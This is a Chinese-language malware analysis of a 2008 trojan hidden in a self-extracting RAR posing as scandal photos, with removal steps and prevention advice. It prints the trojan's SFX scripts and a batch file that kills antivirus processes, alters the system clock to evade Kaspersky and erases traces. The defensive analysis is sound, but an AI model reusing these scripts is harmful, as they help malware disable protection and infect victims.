虚拟机系统:windows xp2
下载软件:迅雷
杀毒软件:瑞星2008(打了最新补丁包)
一、中招过程
朋友好奇,寻找艳照门图片。在百度某贴吧中看到一条信息,提供艳照下载,并且给出了链接地址“http://guilin123.*.com/yanmenzhao.rar”于是迫不及待地用迅雷下载,下载的过程中“迅雷安全中心”弹出病毒威胁警告对话框,由于是测试忽略,点击“继续下载”。(图1)
为了测试,笔者的迅雷设置了“下载完成后杀毒”。下载完成后,瑞星病毒扫描后提示“发现2个病毒,清除失败!”(图2)
二、病毒分析
下载完成的这个名称为yanmenzhao,大小为1.04M文件是个压缩文件,后缀为rar。右键单击选择“解压到yanmenzhao下”,解压后为yanmenzhao.exe,其后缀为exe,这是个自动解压文件,估计攻击者一定在其中做了文章。(图3)
这时千万不能直接双击打开,打开后一定会运行自解压脚本就会中招。先打开WinRAR压缩软件,然后通过“文件”→“打开压缩文件”来打开yuanmenzhao.exe,果然在其下有两个文件:艳门照.rar、ymz.exe。第一个文件应该就是图片压缩包,而第二个就是木马压缩文件。同时在WinRAR的右侧窗格中发现如下代码:(图4)
Path=%systemroot% Setup=ymz.exe Presetup=艳门照.rar Silent=1 Overwrite=1 |
解释如下:
第一行是文件的解压路径,在系统根目录下;
第二页是解压后自动运行ymz.exe;
第三行是在解压之前先解压艳门照.rar,达到掩人耳目,看不到ymz.exe文件,其实它已经运行了;
第四行是隐藏文件,达到更隐蔽;
第五行是覆盖目录下的同名文件,以容错更可靠。
用同样的方法在WinRAR中解压ymz.exe,发现下面5个文件:(图5)
1.bat 1.exe 1.vbs knlps.exe knlps.sys |
同样在右边有自解压脚本代码:
Path=%systemroot%\temp SavePath Setup=1.vbs Silent=1 Overwrite=1 |
原理好上面的一样,只不过是解压到系统临时目录下。
用记事本打开1.vbs分析,代码如下:
CreateObject("WScript.Shell").Run "cmd /c 1.bat",0 |
很明显,是调用1.bat文件。
用记事本打开1.bat文件,代码及其解释如下:
@ECHO OFF knlps.exe -l >PID.txt FINDSTR /i "RavMon.exe" PID.TXT >>RAV.txt FINDSTR /i "RavMonD.exe" PID.TXT >>RAV.txt FINDSTR /i "CCenter.exe" PID.TXT >>RAV.txt FOR /F "eol=; tokens=1 delims= " %%1 in (RAV.txt) do knlps.exe -k %%1 |
上述代码是获取瑞星组件的进程ID并通过knlps.exe结束瑞星的进程。
set date=%date% date 1990-01-01 date 1990-01-01 |
上述代码是修改系统时间使卡巴监控失效,这句是关键破卡巴查杀的程序流,没这句被杀木马就会被杀。
@echo off & setlocal enableextensions echo WScript.Sleep 1000 > %temp%.\tmp$$$.vbs set /a i = 15 :Timeout if %i% == 0 goto Next setlocal set /a i = %i% - 1 cscript //nologo %temp%.\tmp$$$.vbs goto Timeout goto End |
上述代码是倒计时等待15秒
:Next
%systemroot%\temp\1.exe 这个是你木马的名称
for %%f in (%temp%.\tmp$$$.vbs*) do del %%f
上述代码第二回行就木马名称的解压目录,第三行行是倒计时等待结束后运行木马并删除。
date 2007-10-27 aaa date %date% aaa |
上述代码是恢复系统时间(卡巴监控)
RD /S /Q %systemroot%\temp\ |
上述代码的含义是删除临时文件清除痕迹。
从上面的分析可以看出该自解压包木马的运行机制是,先通过脚本终结瑞星和卡巴斯基,然后运行真正的木马程序,即1.exe,最后清除痕迹。
三、运行病毒
1、瑞星被终结
分析完毕,然后双击yanmenzhao.exe看看中毒症状。为了分析病毒的运行状况,事先打开了瑞星的“实时监控”和“任务管理器”,以观察病毒运行状态。运行后瑞星没有任何提示,任务栏中的瑞星实时监控图标消失,看来瑞星被终结了。另外,在任务管理中出现了一个cscript.exe进程见图6,很快地闪动,鼠标无法选择结束,大概几秒钟后该进程消失,在进程管理器中有多了2个svchost.exe进程见图7。(笔者在测试前备份了进程表,以前的为5个,多了2个)(图6)(图7)
2、可疑的网络连接
在命令提示符下敲入命令:
查看网络端口连接情况,果然发现了两个可疑IP地址的端口连接:(图8)
TCP 192.168.131.72:1098 116.20.215.181:8008 ESTABLISHED 1916 TCP 192.168.131.72:1099 116.20.215.181:2630 ESTABLISHED 424 |
这两个连接正好是刚才创建的两个svchost.exe进程创建的。其中的IP 116.20.215.181应该是攻击者的IP或者是一个中转IP。打开www.ip138.com查询,得知是广东省佛山市电信。(图9)
四、清除病毒
1、结束进程
在结束进程的发现这两个svchost.exe进程之间互相保护,当结束了其中的一个,另一个马上会重新新建一个。因此手工结束速度太慢,通过批处理命令来清除:
把如下代码保存为kill.bat,双击即可。
@echo off taskkill /f /pid 1916 taskkill /f /pid 424 exit |
提示:其中的pid是随机的,一定要找到可疑的svchost.exe进程的pid,如果结束了系统启动的svchost.exe的话,系统就会关机或者重启。确定的方法,可以参考图8。
2、删除服务
运行services.msc打开“服务”工具,通过分析发现了一个可疑的服务项。
服务名称为:Workstain
显示名称:qmijiu
描述:Wicrosoft .NET Framework TPM
可执行文件路径:c:\WINDOWS\system32\svchost.exe -k Workstain
启动类型:自动
服务状态:已启动
评析:该服务项和Workstation非常相似,并且描述极具欺骗性,攻击者非常狡猾。(图10)
提示:在禁用服务的过程中发现,如果不先结束两个svchost.exe进程,发现根本无法禁用,当你选择禁用该服务,点击确定,它马上改为“自动”运行,可见这也是进程保护在作怪。因此必须把两个进程结束掉再禁止服务。最彻底的是用命令把该服务删除,命令为:
3、文件删除
(1)C:\WINDOWS目录下的(图11)
艳门照.rar
ymz.exe
(1)C:\WINDOWS\system32目录下的(图12)
Workstain.drv
Sharing.dll
总结:该木马病毒利用大众的猎奇心理,把木马和图片打包在一起,然后通过WinRAR的自解压功能使得木马得以运行。其原理比较简单,但象朋友这样的人却屡屡中招。这例“艳照门”木马病毒给我们的启示是:
1、做好自律,不去猎奇浏览不雅的东西;
2、在系统中要设置显示文件的后缀,这样可以通过文件后缀就可以判断文件的类型。
3、对自解压文件要非常小心,千万不要直接打开,应该选择用winRAR软件打开,看看有没有可疑的脚本和程序。总之,在思想上和技术上都做好准备,不要成为“艳照门”木马病毒的下一个受害者。
文章来源:http://security.ctocio.com.cn/tips/348/7814348.shtml
分享到:
相关推荐
案例分析:自动送货机器人的实现; 案例分析:自动送货机器人的实现; 案例分析:自动送货机器人的实现; 案例分析:自动送货机器人的实现; 案例分析:自动送货机器人的实现; 案例分析:自动送货机器人的实现; ...
5. 案例研究:分析历史上的知名木马事件,如“爱虫”(ILOVEYOU)、“震荡波”(Worm.Sasser)等,从中吸取教训,提升对网络安全威胁的敏感度。 6. 应急响应和恢复:学习在遭受特洛伊木马攻击后,如何迅速隔离受...
在本实例中,我们将深入探讨一个基于HTML5和CSS3的3D旋转木马效果相册,这是一个充满吸引力的图片展示方式,能够为用户带来独特的浏览体验。 3D旋转木马效果相册利用了CSS3的transform属性,尤其是rotateY()和...
ARP欺骗案例分析:攻击过程与技术细节
物联网之安全算法:公钥基础设施(PKI):物联网安全实战案例分析.docx
### Oracle SOA实施的最佳实践与案例分析:江苏电力SOA实例深度解读 #### SOA为何成为企业转型首选 在IT领域,面向服务的架构(Service-Oriented Architecture,简称SOA)凭借其灵活性、可扩展性和重用性,逐渐...
《工业互联网安全测试技术:SCADA渗透测试流程实例》 SCADA(Supervisory Control And Data Acquisition)系统在工业互联网中扮演着至关重要的角色,它用于监控和控制关键基础设施,如能源、水处理和制造业。然而,...
物联网之安全算法:哈希算法(SHA-256):物联网安全实战案例分析.docx
搜索引擎之安全与隐私:User Privacy Protection:搜索引擎安全与隐私案例分析
3. 法规执行与案例研究:通过具体案例分析,展示法律在应对木马威胁时的实际效果,以及可能存在的挑战和改进空间。 4. 国际合作与协调:讨论全球范围内如何通过立法、执法和司法合作,共同应对跨国计算机木马攻击。...
通过分析真实世界的案例,学习如何发现漏洞、编写exploit代码以及如何修复这些问题,有助于提升安全从业人员的实战技能。 此外,书中还可能涵盖了网络嗅探、会话劫持、SSL/TLS安全、Web应用防火墙(WAF)绕过、源...
#### 实战案例分析 根据提供的部分内容,我们可以看到一个具体的实战案例: - 用户首先注意到计算机性能下降,怀疑存在木马。 - 使用特定工具(如“#$%&’”)检查运行中的程序,发现可疑程序。 - 进一步调查启动项...
- 静态应用程序安全测试(SAST):在不运行代码的情况下分析应用程序的安全性。 - 动态应用程序安全测试(DAST):在运行时对应用程序进行安全测试。 - 安全漏洞扫描:检查应用程序中已知的安全漏洞。 5. 安全...
以下是一个实际产品经理项目的典型案例分析: 案例背景: 项目名称:智能家居安防系统 项目目标:设计并开发一款智能家居安防系统,包括门窗传感器、摄像头和远程控制应用,以增强家庭安全,满足消费者对智能安防...
6. **案例研究**:通过具体的木马案例,分析了其攻击过程和防护策略,帮助读者提升对实际威胁的识别和处理能力。 7. **安全意识培养**:强调了用户的安全意识在防止木马入侵中的重要性,教导读者养成良好的上网习惯...
《MATLAB小波分析与应用--30个案例分析》是编者崔丽在10多年讲授“小波分析与应用”课程的基础上编写而成的。主要借助MATLAB软件,对小波分析的主要框架进行直观的讲解,并以案例分析的方式,对其主要应用领域进行...
安全生产事故案例分析是注册安全工程师必须掌握的重要技能之一,它涉及到对各类生产安全事故的原因、过程、后果及预防措施的深入理解和应用。以下是基于这个主题的一些关键知识点: 一、事故定义与分类 事故是指在...
《MATLAB统计分析与应用:40个案例分析》是一本深入探讨MATLAB在统计分析领域实际应用的著作。本书通过40个精心设计的案例,涵盖了从基础统计概念到高级数据分析技术的广泛主题,旨在帮助读者提升在科学研究、工程...
R 语言数据分析案例:探索零售数据集并进行销售分析.docx R 语言数据分析案例:探索零售数据集并进行销售分析.docx R 语言数据分析案例:探索零售数据集并进行销售分析.docx R 语言数据分析案例:探索零售数据集并...